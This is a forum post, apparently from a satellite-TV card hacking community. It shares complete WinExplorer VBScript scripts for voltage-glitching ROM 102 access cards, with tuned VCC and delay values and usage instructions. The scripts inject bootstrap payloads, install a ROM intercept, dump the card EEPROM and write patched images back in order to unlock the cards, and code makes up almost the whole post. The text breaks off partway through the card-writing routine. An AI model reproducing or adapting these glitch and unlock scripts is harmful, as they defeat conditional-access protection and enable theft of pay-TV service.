hey guys, anyone using the white nexus and unlocking rev 106, 107, and 108's. I have set my pot at 700 ohms with dips 2 and 5 to unlock. Now, I have modified the scripts vcc and delay range to maximize it for the white nexus. I have never had a card glitch at over 15 vcc and have plenty hit below 2 vcc so I changed the vcc start and limit to 15 and 00. NOw for really stubborn cards I have changed the delay start to 3800 and left the limit alone. I am 100 percent since I done this. I am also leaning away from rebelsurfs scripts. They are great work and work for many people but I think it loops more easily. I am included both winexplorer scripts I have used. The first on is for 106, and 107. The second one is for 108. copy and paste them to notepad and then save them as anything you want with a .xvb extension to make them valid winexplorer scripts. Please post results here and also if for some reason your white nexus glitches at higher vcc's than mine, this may not be for you. I am NOT guaranteeing this not to loop cards. I have had great success since I have changed these values. In the 106, 107 script I have left the delays default as it seems to always work for me, if it won't pop after one cycle of the delays, then change the start to &h3800. For the 108 I have already done this because it seems they like to hit a little lower than 106 and 107. I believe these scripts should also be good on a blue nexus at 200 or 700 ohms.
I am also adding my rev 105 and 103 script I have tweaked for white nexus.

REV 103 AND 105

'
' New VB Script File - Created 11/28/2005
'
'Execute Code Glitch FOR A0FF-INTERCEPT ROM 102, ALL IN ONE
'AUTO FIND VCC
'USE ON REVS 105 AND UNDER. OR KNOW WHAT YOUR REPLACING.
'YOU COULD LOOP YOUR CARD.
'
'Fine tune all values for your loader in
'User selectable options
'
'Notes:
'This script REQUIRES ND13 and it will check for it!!!
'
'THANKS TO: NO1B4ME, BobsBigBoy, lynard, dytene, silverman, and many others.
'
'Good Luck!
'penga


OPTION EXPLICIT
Dim FileName
Dim Dump
Dim OutFile


' You can set your own settings or use these ones.
' remove ' to use these ones in script
' CALL setupunlocker()

Sub Main()
Dim BootStrapCmd04
Dim BSCLen
Dim BSCRSP
Dim BSACK
Dim CmdToGlitch
Dim CTGLen
Dim CTGRSP
Dim CS
Dim Bytes
Dim BytesRead
Dim Bytes1
Dim Bytes2
Dim DelayStart
Dim DelayLimit
Dim VCCStart
Dim VCCLimit
Dim GlitchType
Dim GlitchMax
Dim GlitchMin
Dim Delay
Dim VCC
Dim Dot
Dim ATRrsp
Dim loopctr
Dim AddrHiStart
Dim AddrHiEnd
Dim RomAddr
Dim PageSet
Dim trys
Dim mix

clearoutputwindow
Sc.Verbose = TRUE
loopctr = 0
if CheckChipVer <> 1 then
Sc.MsgBox("You need chip version ND13 to run this script" & VbCr & "Flash your Atmel chip with NewD13.hex")
Exit Sub
End if
Sc.Verbose = False 'Turn echo on - False = turns it off
VCCStart = &h15 'h25 is standard, script is auto vcc dont change 90
VCCLimit = &h00 'h05 is standard, script is auto vcc dont change 02

'================================================= ==
'================================================= ==
'User selectable options
'================================================= ==
'================================================= ==


DelayStart = &h325 'h385 is standard, try 375, 350 has been known to hit too.
DelayLimit = &h350 'h385 is standard, try 395
GlitchMax = 9 '7 is standard - 7, 8, or 9
GlitchMin = 6 '7 is standard - 6, or 7
trys = 100 '100 is standard
mix = 0.5 '0.5 is standard - try 0.1 to 1.2 use for +-+-+-+- mix

'************************************************* *************************
'************************************************* *************************
'******* This Section is FOR ADVANCE USERS ONLY **********
'************************************************* *************************
'************************************************* *************************
'This Packet can be changed however you like and the script will generate
'the correct loader packet. Do not include the Checksum byte at the end.
'Cmd 04 without checksum byte - Check will be calculated and inserted
'Loads the RAM dumper code to EMM buffer
'
'Dumper and serial code curtesy of Lynard - Thank you
'
'-------------------------------------------------------------------------------
'NO1'S BOOTSTRAP
'------------------------------------------------
' ROM/EEPROM DUMPER!!!
' all in one
' add $8219:17 63 A1 CA 26 03 CC 60 EC CC 7D 99
' $317F write our bug in table 60DB 8219
BootStrapCmd04 = "21 00 6D A0 CA 00 00 67 04 65 01 01 86 00 AA 9D 9D 9D 9D 9D 9D 9D 9D A6 4B B7 6B 18 64 CD 7C 16 82 19 BE 0C A6 4B B7 6B 18 64 CD 7C 16 31 7F A5 04 CC 7A 99 60 DB 82 19 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D BC 80 17 63 A1 CA 26 03 CC 60 EC CC 7D 99 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D BC 80 02"
'--------------------------------------------------------------------------------------
BSCRSP = 8 'Expected Response = 12 00 04 84 00 90 00 02
'Length = 8 bytes
BSACK = &H80 'Boot Strap running Acknowledge byte
'************************************************* *************************
'************************************************* *************************
'************************************************* *************************
'This Packet can be changed however you like and the script will generate
'the correct loader packet.
'The acutal packet that we're going to glitch without Checksum
CmdToGlitch = "21 00 08 A0 CA 00 00 02 15 00 86"
CTGRSP = 6 'Length in bytes of expected response WERE LOOKING FOR 6F
'Expected Response = 12 40 02 6F 00 3F
'************************************************* *************************
'************************************************* *************************
'************************************************* *************************

BSCLen = GetPacketLen(BootStrapCmd04)

if (BSCLen AND 1) = 1 then
Sc.MsgBox("Bad BootStrapCmd04 packet")
sc.print BSCLen
Exit Sub
End if

BSCLen = BSCLen / 2
BSCLen = BSCLen + 1 'add Checksum byte to packet length

CTGLen = GetPacketLen(CmdToGlitch)

if (CTGLen AND 1) = 1 then
Sc.MsgBox("Bad CmdToGlitch packet")
Exit Sub
End if

CTGLen = CTGLen / 2
CTGLen = CTGLen + 1 'add Checksum byte to packet length

CS=DoCheckSum (BootStrapCmd04) 'Calculates BootStrapCmd04 Checksum
BootStrapCmd04 = BootStrapCmd04 + CS 'add checksum to packet

CS=DoCheckSum (CmdToGlitch) 'Calculates packet Checksum
CmdToGlitch = CmdToGlitch + CS 'add checksum to packet

GlitchType = GlitchMax
Delay = DelayStart
VCC = VCCStart
Sc.Print "Let the 102 Glitching begin...." & VbCr
Dot = 0 'Dot progress counter if Sc.Verbose = False

Do
Do
sc.delay(5)
Sc.Write("A2")
Sc.Write("B0" & HexString(VCC, 2)) 'set glitch VCC
sc.delay(10)
Sc.Write("06 10 01 03 50 1A 00") 'reset card
Sc.Read(02)

ATRrsp = Sc.Getbyte(1)
if ATRrsp = &h1B then 'check card reset ok
Sc.Read(ATRrsp)
Exit Do
else
print VbCr & "NO ATR Rcv'd, trying 2nd ATR..."
sc.delay(100)
Sc.Write("B0" & HexString(VCC, 2)) 'set glitch VCC
sc.delay(30)
Sc.Write("08 10 01 01 01 03 50 1A 00") 'reset card
Sc.Read(02)
ATRrsp = Sc.Getbyte(1)
if ATRrsp = &h1B then 'check card reset ok
Sc.Read(ATRrsp)
Exit Do
else
print VbCr & "NO 2nd ATR Rcv'd, continue reset, back to first atr" & VbCr
'exit Do
sc.delay(100)
Sc.Write("04 01 01 01 00") 'reset card
end if
End if
loop

Sc.Write("02 15 00") 'set Tx/Rx to 32 cycles per bit
Sc.Read(02)
sc.delay(5)
'Send dirty EMM (Cmd04) with our ram dump code
Sc.Write(HexString((BSCLen + 5), 2) & "60" & HexString((BSCLen - 1), 2) & BootStrapCmd04 & "50" & HexString((BSCRSP - 1), 2) & "00")
Sc.Read(2)

Bytes = Sc.Getbyte(1)
if Bytes > 0 then
Bytes = Sc.Read(Bytes)
Bytes1 = Sc.Getbyte(0)
Bytes2 = Sc.Getbyte(5)
'--------check response to make sure = 12 00 04 97 00 90 00 11--------
if Bytes1 = &h12 and Bytes2 = &h90 then
sc.verbose = false
else
print VbCr & "Bad CMD04 response......" & VbCr
exit sub
end if
else
print VbCr & "Bad CMD04 response....." & VbCr
exit sub
End if

sc.delay(20)
'loader glitch packet
Sc.Write(HexString((CTGLen + 10), 2) & "15 60" & HexString((CTGLen - 1), 2) & CmdToGlitch & "20" & HexString(Delay, 4) & HexString(GlitchType, 2) & "50" & HexString((CTGRSP - 1), 2) & "00")

Sc.Read(2)
Bytes = Sc.Getbyte(1)
if Bytes > 4 then
Bytes = Sc.Read(Bytes)
Bytes1 = Sc.Getbyte(3)
Bytes2 = Sc.Getbyte(0)
'--------check response to SEE IF = 6F 00--------
if Bytes1 = &h6F then
sc.verbose = true
Sc.Write("A1")
Sc.Print VbCr
Sc.Print "===========================================" & VbCr
Sc.Print "Glitch Success!! A0FF-INTERCEPT IS ON" & VbCr
Sc.Print "BootLoader 6F 00 RSP Received!!" & VbCr
Sc.Print "VCC = "& HexString(VCC, 2) & " (~" & ((5/255) * VCC) &" vdc)" & VbCr
Sc.Print "Glitch Delay = "& HexString(Delay, 4) & VbCr
Sc.Print "Glitch type " & HexString(GlitchType, 2) & VbCr
Sc.Print "===========================================" & VbCr
Exit Sub

end if
if Bytes2 <> &h12 then
Vcc = Vcc + .25
print "+"
end if
else 'if bytes >4
print "NoRsp+"
VCC = VCC + .75
End if 'if bytes >4

VCC = VCC - mix
print "-"
GlitchType = GlitchType - 1

if VCC < VCCLimit then
VCC = &h15
print " hit VCCLimit, back up to & 15 vcc "
end if
if GlitchType < GlitchMin then
GlitchType = Glitchmax
end if


loopctr = loopctr +1
if loopctr > trys then
clearoutputwindow
loopctr = 0
Delay = Delay + 1
if Delay > DelayLimit then
Delay = DelayStart
end if
Sc.Print "Let the 102 Glitching continue...." & VbCr
Sc.Print " LETS TRY NEW DELAY " & VbCr
Sc.Print "Glitch Delay = "& HexString(Delay, 4) & VbCr
Sc.Print "VCC = "& HexString(VCC, 2) & VbCr
Sc.Print " " & VbCr
end if


loop

End Sub

Function GetPacketLen (Packet)
Dim Length
Dim Temp
Dim PK
Dim i

PK = ""

Length = Len(Packet) 'get packet length with spaces

for i = 1 to Length
Temp = Mid(Packet, i, 1)
if Temp <> " " then 'remove all spaces in packet
PK = PK + Temp
End if
next

GetPacketLen = Len(PK) 'return packet length without spaces

End Function


Function DoCheckSum (Packet)
Dim Temp
Dim Length
Dim PK
Dim CheckSum
Dim i

PK=""

Length = Len(Packet) 'get packet length with spaces

for i = 1 to Length
Temp = Mid(Packet, i, 1)
if Temp <> " " then 'remove all spaces in packet
PK = PK + Temp
End if
next

Length = Len(PK) 'get packet length without spaces

CheckSum = 0

for i = 0 to Length
i=i+1 'Simulate Step 2 in VB scripting
Temp = Mid(PK, i, 2)
CheckSum = CheckSum XOR Hex2Dec(Temp) 'Calc Checksum
next

DoCheckSum = HexString(CheckSum, 2) 'convert checksum to a hex strimg and return it to caller

End Function

Function Hex2Dec(HexNumber)
' This function takes 1 argument, a string containing a hex value of any digit length
' and returns the decimal equivalent
Dim DecimalValue
Dim DigitCount
Dim Digit
Dim HexDigit

HexNumber = Replace(UCase(HexNumber), " ", "")
DigitCount = Len(HexNumber)

For Digit = 1 To DigitCount

HexDigit = Mid(HexNumber, Digit, 1)
If Asc(HexDigit) < 58 Then
DecimalValue = HexDigit * 16 ^ (DigitCount - Digit)
Else
DecimalValue = (Asc(HexDigit) - 55) * 16 ^ (DigitCount - Digit)
End If
Hex2Dec = Hex2Dec + DecimalValue
Next

End Function

Function HexString(Number,Length)
' This function takes 2 arguments, a number and a length. It converts the decimal
' number given by the first argument to a Hexidecimal string with its length
' equal to the number of digits given by the second argument
Dim RetVal
Dim CurLen
RetVal=Hex(Number)
CurLen=Len(RetVal)
If CurLen<Length Then
RetVal=String(Length-CurLen,"0") & RetVal
End If
HexString=RetVal
End Function

Function CheckChipVer()

CheckChipVer = 1

sc.write("90")
delay(80)

if sc.read(4) <> 4 then
CheckChipVer = 0
Exit Function
End if

if getbyte(0) <> &H4E then CheckChipVer = 0
if getbyte(1) <> &H44 then CheckChipVer = 0
if getbyte(2) <> &H31 then CheckChipVer = 0
if getbyte(3) <> &H33 then CheckChipVer = 0

End Function
Function setupunlocker()
sc.print "________________Setting up WinExplorer_________________" & VbCr
Wx.BaudRate = 115200
Wx.ResetBaudRate = 115200
Wx.Parity = 0 ' 0 = None, 1 = Odd, 2 = Even, 3 = Mark, 4 = Space
Wx.StopBits = 0 ' 0 = 1 stop bit, 1 = 1.5 stop bits, 2 = 2 stop bits
Wx.DTRControl = 0 ' Initial state of DTR 0 = off, 1 = on
Wx.RTSControl = 1 ' Initial state of RTS 0 = off, 1 = on
Wx.ResetDelay = 100 ' In microseconds
Wx.ByteDelay = 10 ' In microseconds
Wx.RxByteTimeout = 500 ' In milliseconds
Wx.ResetMode = 2 ' 0 = No Resets, 1 = ISO Reset (Expect a ATR), 2 = Device Reset (No ATR)
Wx.ResetLine = 1 ' 0 = Toggle RTS for Reset, 1 = Toggle DTR for Reset
Wx.ByteConvention = 1 ' 0 = Inverse, 1 = Direct
Wx.FlushEchoByte = 0 ' 0 = no flush, 1 = flush - A Phoenix interface will echo each byte transmitted.
Wx.FlushBeforeWrite = 1 ' 0 = no flush, 1 = flush - Flush the receive buffer before each write to strip off Null bytes.
Wx.IgnoreTimeouts = 1 ' 0 = Abort script on a receive timeout, 1 = Ignore all receive timeouts
Wx.ResetAfterTimeout = 0 ' 0 = Don't reset after a timeout, 1 = do a reset after a timeout - Not used if "IgnoreTimeouts=0"
Wx.LogTransactions = 0 ' 0 = Don't log transactions, 1 = log transactions
Wx.DisplayUSW = 0 ' Display USW after script complete 0 = no, 1 = yes
Wx.DisplayFuse = 0 ' Display Fuse after script complete 0 = no, 1 = yes
End function



REV 106 and REV 107
'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
'X Rom10X Reader/Writer/Unlocker X
'X For ROM 102 Cards REV 106-107-242-243-282-283 X
'X X
'X XXXXX XX XXXX X
'X XX XX XXX XX XX XXX XX XX XX XX X
'X XX XX XX XX XXX XXX XX XX XX XX XX X
'X XX XX XX XX XX X XX XX XX XX XXX X
'X XXXX XX XX XX XX XX XX XX XXX X
'X XX XX XX XX XX XX XX XX XX XX XX X
'X XX XX XXX XX XX XX XX XX XX XX X
'X XX XX XXXX XXXX X
'X =========================================== X
'X Please Note: Attempt to read your card a few times to make sure that your loader is set up X
'X properly before you attempt to write to your card. USE AT YOUR OWN RISK! X
'X You may loop your CAM!!!!! X
'X Various code snippets used from other scripts posted. Kudos to the Authors.. you know who you X
'X are. X
'X X
'X ROM10X Coder Team X
'X www.rom10x.com X
'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX


Const fsoSEEK_SET = 0
Const fsoSEEK_CUR = 1
Const fsoSEEK_END = 2
Const ofOverwritePrompt = &H2 ' Generates a warning message if the user tries to select a file name that is already in use,
Const ofHideReadOnly = &H4 ' Removes the Open As Read Only check box from the dialog.
Const ofPathMustExist = &H800 ' Generates an error message if the user tries to select a file name with a nonexistent directory path.
Const ofFileMustExist = &H1000 ' Generates an error message if the user tries to select a nonexistent file. (only applies to Open dialogs).
Const ofShareAware = &H4000 ' Ignores sharing errors and allows files to be selected even when sharing violations occur.
Const ofEnableSizing = &H800000 ' (Windows 98 and later) Lets the Explorer-style dialog be resized with the mouse or keyboard.
Dim T1
Dim T2
Dim T3
Dim T4
Dim T5
Dim T6
Dim EEPROMFileName
Dim OutFileHndl, FileName, FileHandle
Dim WriteDelay


'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
WriteDelay = 10 'This can be edited to increase delays for slower loaders. Default = 10 X
'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Sub Main()

Sc.Verbose = false 'set to true to view RX/TX from card

Dim Bytes
Dim Byte1
Dim Byte2
Dim Byte3
Dim Ulock
Dim CS
Dim SFlag
Dim RomVer
Dim RetVal

ClearOutputWindow()

Call SetupUnlocker()

If CheckChipVer = 1 Then
Else
Sc.MsgBox("This script requires ND13 atmel code. Please flash your loader with ND13.")
Exit Sub
End If

If CheckCard = 1 Then
Else
Exit Sub
End If

Sc.Write("02 15 00")
Sc.Read(2)

Do
RetVal = Sc.ButtonBox("Please choose function to perform:" & vbcrlf & vbcrlf, vbDefaultButton3 + vbCritical, "Rom10X 102 Read/Write/Unlock Utility", "Read Card", "Write Card", "Unlock Card", "Exit")

If RetVal = 0 Or RetVal = 4 Then
Sc.Print ("User Aborted!") & VbCr
Exit Do
End If

If RetVal = 1 Then
Call ReadCard()
End If

If RetVal = 2 Then
Call WriteCard()
End If

If RetVal = 3 Then
Call MethodThree()
End If
Loop
End Sub

Sub MethodThree

Dim BSCLen
Dim CmdToGlitch
Dim CmdTosetup
Dim CTGLen
Dim CTGLen2
Dim CTGRSP
Dim CS
Dim Bytes
Dim BytesRead
Dim Bytes1
Dim Bytes2
Dim DelayStart
Dim DelayLimit
Dim VCCStart
Dim VCCLimit
Dim GlitchType
Dim GlitchMax
Dim GlitchMin
Dim Delay
Dim VCC
Dim Dot
Dim ATRrsp
Dim loopctr
Dim AddrHiStart
Dim AddrHiEnd
Dim cRet
Dim RomAddr
Dim PageSet
Dim trys
Dim mix
Dim AVRDelay
Dim AVRCount

clearoutputwindow()

loopctr = 0
AVRCount = 0

If CheckChipVer <> 1 Then
Sc.MsgBox("You need chip version ND13 to run this script" & VbCr & "Flash your Atmel chip with NewD13.hex")
Exit Sub
End If

Sc.Verbose = false 'Turn echo on - False = turns it off
VCCStart = &H15 'h25 is standard, script is auto vcc dont change 90
VCCLimit = &H00 'h05 is standard, script is auto vcc dont change 02

'================================================= =========================
'================================================= =========================
'User selectable options
'================================================= =========================
'================================================= =========================

DelayStart = &H39E7 'Change this to whatever you want
DelayLimit = &H3A50 'This is the limit. it will go back to DelayStart when it reaches here.
GlitchMax = 7 '7 is standard - 7, 8, or 9
GlitchMin = 7 '7 is standard - 6, or 7
trys = 40 '100 is standard
mix = 0.5 '0.5 is standard - try 0.1 to 1.2 use for +-+-+-+- mix
AVRDelay = 3 'Minimum = 3 Delay for atmel to wait for a response
'************************************************* **************************
'************************************************* **************************
'******* This Section is FOR ADVANCE USERS ONLY ********
'************************************************* **************************
'************************************************* **************************

GlitchType = GlitchMax
Delay = DelayStart
VCC = VCCStart
Sc.Print("Let the 102 Glitching begin...." & VbCr)
Dot = 0
Do
Do
Sc.Write("A2")
Sc.Write("B0" & HexString(VCC, 2))

Sc.Write("06 10 01 03 50 1A 00")
Sc.Read(2)

ATRrsp = Sc.Getbyte(1)

Sc.Read(ATRrsp)
If ATRrsp = &H1B Then
Exit Do
Else
Sc.Write("B0" & HexString(VCC, 2))
sc.delay(30)
Sc.Write("08 10 01 01 01 03 50 1A 00")
Sc.Read(2)
ATRrsp = Sc.Getbyte(1)
If ATRrsp = &H1B Then
Sc.Read(ATRrsp)
Exit Do
Else
print(VbCr & "NO 2nd ATR Rcv'd, continue reset, back to first atr" & VbCr)
sc.delay(100)
Sc.Write("04 01 01 01 00")
End If
End If
Loop

Sc.Write("02 15 00")
Sc.Read(2)

Sc.Write("0A 60 04 21 C1 01 80 61 50 04 00")
Sc.Read(2)
cRet = Sc.Getbyte(1)
Sc.Read(cRet)

Sc.Write("0B 60 05 21 C1 02 5A 44 FC 50 03 00")
Sc.Read(2)
cRet = Sc.Getbyte(1)
Sc.Read(cRet)

Sc.Write ("73 0A 70 8D 00 A7 00 00 00 00 00 00 00 00 00 00 00 00 71 80 18 64 A6 4B B7 6B CD 7C 16 30 C0 A4 02 18 64 CD 7C 16 95 C0 A6 07 18 64 CD 7C 16 31 76 AD 08 20 18 95 BF BF A1 FF 27 01 87 BC 88 01 1E 05 00 60 DB 95 C0 DE CA FE C0 FF EE CD 5A C0 00 B5 0D F8 06 A6 06 B7 64 B7 4C CD 45 05 20 FE 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00")
Sc.Read(2)
Sc.Write ("47 0E" & hexstring(AVRDelay, 2) & "0B 60 3A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 AE BC 20" & HexString(Delay, 4) & HexString(GlitchType, 2) & "50 05 00")
Sc.Read(2)
Bytes = Sc.Getbyte(1)
sc.verbose = true
Sc.Read(Bytes)
sc.verbose = false
If Bytes > 3 then
AVRCount = 0
Bytes1 = Sc.Getbyte(0)
Bytes2 = Sc.Getbyte(3)

If Bytes1 = &hDE And Bytes2 = &HC0 Then
Sc.Write("A1")
Sc.Print(VbCr)
Sc.Print("===========================================" & VbCr)
Sc.Print("Glitch Success!! DE CA FE C0 FF EE" & VbCr)
Sc.Print("Card is Unlocked!!!" & VbCr)
Sc.Print("VCC = " & HexString(VCC, 2) & " (~" & ((5 / 255) * VCC) & " vdc)" & VbCr)
Sc.Print("Glitch Delay = " & HexString(Delay, 4) & VbCr)
Sc.Print("Glitch type " & HexString(GlitchType, 2) & VbCr)
Sc.Print("===========================================" & VbCr)
Exit Sub
Else
If Bytes2 = &H6F Then
sc.print("-")
Else
If Bytes2 = &HFF Then
Sc.Print("+")
Else
sc.print "NoRsp+"
End If
End If
End If

If Bytes1 = &H12 Then
Vcc = Vcc + 0.25
End If
Else
AVRCount = AVRCount + 1
If AVRCount => 5 then
AVRDelay = AVRDelay + 1
Sc.print "Increasing AVR delay to " & hexstring(AVRdelay ,2) & vbcr
AVRCount = 0
End If
End If

VCC = VCC - mix
print("-")
GlitchType = GlitchType - 1
If VCC < VCCLimit Then
VCC = VCCStart
End If
If GlitchType < GlitchMin Then
GlitchType = Glitchmax
End if
loopctr = loopctr + 1
If loopctr > trys Then
clearoutputwindow()
loopctr = 0
Delay = Delay + 1
If Delay > DelayLimit Then
Delay = DelayStart
End If
'end if
Sc.Print("Let the 102 Glitching continue...." & VbCr)
Sc.print("AVR delay = " & hexstring(AVRdelay ,2) & VbCr)
Sc.Print("Glitch Delay = " & HexString(Delay, 4) & VbCr)
Sc.Print("VCC = " & HexString(VCC, 2) & VbCr)
Sc.Print(" " & VbCr)
End If
Loop
End Sub

Sub ReadCard()

Dim Bytes
Dim BootStrap
Dim CS
Dim Counter
Dim PBCounter
Dim Address

Address = 12288
PBCounter = 1

Sc.Write("06100103501A00") '-Get ATR
Sc.Delay(80)
Sc.Read(2)
Bytes = Sc.GetByte(1)
Sc.Read(Bytes)
Sc.Write("021500")
Sc.Read(2)
Sc.Write("0A600421C101A041500400") '-Set IFS
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(Bytes)

GetEEPROMFileName()

Do
'Get 64 bytes from Card using "Address" as pointer
BootStrap = "21006DA0CA000067046501018600AA9D9D9D9D9D9D9D9D7180 CD5AC0" & HexString(Address, 4) & "0DF840B691B74CCD4505CC7A959D9D9D9D9D9D9D9D9D9D9D9D 9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D 9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D 9D9D9D9D9D9D02"

CS = DoCheckSum(BootStrap) 'Get Checksum of BootStrap string
BootStrap = BootStrap & CS
Sc.Write("77150E036070" & BootStrap & "8700")
Sc.Read(2)
bytes = Sc.GetByte(1)
Sc.Read(bytes)

Sc.Write("1215AA210007A0FF0000024800330E03504000") 'Execute BootStrap String with A0FF intercept
Sc.Read(2)
Bytes = Sc.GetByte(1)
Sc.Read(bytes)

If Bytes = 0 Then 'Check condition of Atmel after read request
Print(VbCr & "--- Eeprom Read Failed, A0FF intercept is not installed, Or card locked. ---")
Call Sc.MsgBox("--- Eeprom Read Failed, A0FF intercept is not installed ---")
Exit Sub
End If

If Bytes = 65 Then
Counter = Counter + 1

For i = 0 To 63
Call Fs.FilePutc(OutFileHndl, Sc.GetByte(i))
Next

Call Sc.ProgressBox("Address: " & Hexstring(Address, 4), PBCounter, 288, "Saving Eeprom information...")

Address = Address + 64 'increment address pointer by &h40 bytes

If Address = 14336 Then 'If address gets to $3800 then change it to $8000
Address = 32768
End If

PBCounter = PBCounter + 1 'Increment the progressbar

If Address = 49152 Then Exit Do 'If we're at the end, then exit
End If
Loop
Call Sc.ProgressBox("", 0, 256) 'close the progressbar

Fs.FileClose(OutFileHndl) 'close the file
Sc.MsgBox("Reading Complete!")
End Sub

Sub WriteCard()

Dim CheckBugs
Dim BugOrig
Dim InFile
Dim FileName
Dim FileSize
Dim ThisByte
Dim TmpStr
Dim Outfile
Dim CC
Dim Address
Dim Bytes
Dim PBCounter
Dim Tmp1
Dim Tmp2

Address = 12416
PBCounter = 1
'---------------------------------------------------------------------------------------------
Const FileFilter = "All Eprom Files (*.bn102, *.bin)|*.bn102;*.bin;|Bin Files (*.bn102)|*.bn102|Bin Files (*.bin)|*.bin"

FileName = Fs.FileOpenDialog(FileFilter, "Please select a valid bin file", "Default.bn102", ofPathMustExist + ofFileMustExist + ofHideReadOnly + ofEnableSizing)
If FileName <> "" Then
If Fs.FileExists(FileName) = 0 Then
Sc.MsgBox("The file does not exist")
Else
InFile = Fs.FileOpen(FileName, fsoOpenRead)
End If
End If

FileSize = Fs.FileSeek(InFile, 0, fsoSEEK_END)

If FileSize <> 18432 Then
Sc.MsgBox("This file does not appear to be a valid ROM 102 EEPROM file")
Exit Sub
End If

If CheckChipVer = 1 Then
Else
Sc.MsgBox("This script requires ND13 atmel code. Please flash your loader with ND13.")
Exit Sub
End If

If CheckCard = 1 Then
Else
Exit Sub
End If

Sc.Write("02 15 00") 'set baud
Sc.Read(2)

Sc.Write("0A600421C101A041500400") '-set IFS
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)

'This CMD 04 Gets the original value of the first bugtable entry.
'We are going to hook here, so we need to know what was originally there, so we can replace
'after we're finished writing.
CheckBugs = ("21 00 6D A0 CA 00 00 67 04 65 01 01 86 00 AA 9D 9D 9D 9D 9D 9D 9D 9D 71 80 CD 5A C0 31 78 0D F8 06 B6 91 B7 4C CD 45 05 CC 7A 95 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 02")
CC = Dochecksum(CheckBugs) 'calculates the checksum byte
CheckBugs = CheckBugs & CC 'adds the checksum byte at the end of our string

Sc.Write("77150E036070" & CheckBugs & "8700") 'sends our string
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)
If bytes <> 8 Then
checklock = 0
Exit Sub
End If
Checkbugs = "21 00 07 A0 FF 00 00 02 48 00"
CC = Dochecksum(CheckBugs)
CheckBugs = CheckBugs & CC

Sc.Write("12 15 AA" & checkbugs & "0E 03 50 0B 00") 'executes our string with the A0FF intercept
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)

If Bytes = &HC Then
T1 = Sc.Getbyte(0)
T2 = Sc.Getbyte(1)
T3 = Sc.Getbyte(2)
T4 = Sc.Getbyte(3)
T5 = Sc.Getbyte(4)
T6 = Sc.Getbyte(5)
'This variable stores the original Bugtable code, which will be replaced when we're finished writing
'BugOrig = hexstring(T1, 2) & hexstring(T2, 2) & hexstring(T3, 2) & hexstring(T4, 2) & hexstring(T5, 2) & Hexstring(T6, 2)
Else
Sc.Msgbox("The Card appears to be locked")
Exit Sub
End If

'This CMD 04 will write our Bootstrap patch located at $9600
BootWrite = "21006DA0CA000067046501018600AA9D9D9D9D9D9D9D9DA64B B76B18647180CD7C169600A010CC7A95000000000000A1FF27 0187CD5A7D0DFA8080BC800000000000000000000000000000 00000000000000000000000000000000000000000000000000 000000000000000000000002"


CC = DoCheckSum(BootWrite)
BootWrite = BootWrite & CC

Sc.Write("77150E036070" & BootWrite & "8700")
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)

If bytes <> 8 Then
Sc.MsgBox("Write Failed")
Exit Sub
End If
Checkbugs = "21 00 07 A0 FF 00 00 02 48 00"
CC = Dochecksum(CheckBugs)
CheckBugs = CheckBugs & CC

Sc.Write("12 15 AA" & checkbugs & "0E 03 50 05 00")
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)
'This CMD 04 will hook our Bugtable at $3178 = "050060DB9600" (This will later be replaced with original value)
BootWrite = ("21006DA0CA000067046501018600AA9D9D9D9D9D9D9D9DA64B B76B18647180CD7C163178A006CC7A95000000000000050060 DB960000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 000000000000000000000002")
CC = Dochecksum(BootWrite)
BootWrite = BootWrite & CC

Sc.Write("756070" & BootWrite & "500700")
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)
If bytes <> 8 Then
checklock = 0
Exit Sub
End If
Checkbugs = "21 00 07 A0 FF 00 00 02 48 00"
CC = Dochecksum(CheckBugs)
CheckBugs = CheckBugs & CC

Sc.Write("12 15 AA" & checkbugs & "0E 03 50 05 00")
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)

Byte1 = Sc.Getbyte(0)
Byte2 = Sc.getbyte(3)

If Byte1 = &H12 And Byte2 = &H90 Then
Else
sc.msgbox("Write Failed!")
Exit Sub
End If

'-------------------------------------------------------------------------
Call Fs.FileSeek(InFile, FileSize - (FileSize - &H80), fsoSEEK_SET)

TmpStr = ""
For ThisByte = 0 To 18304
If ThisByte > 0 And ThisByte Mod 64 = 0 Then
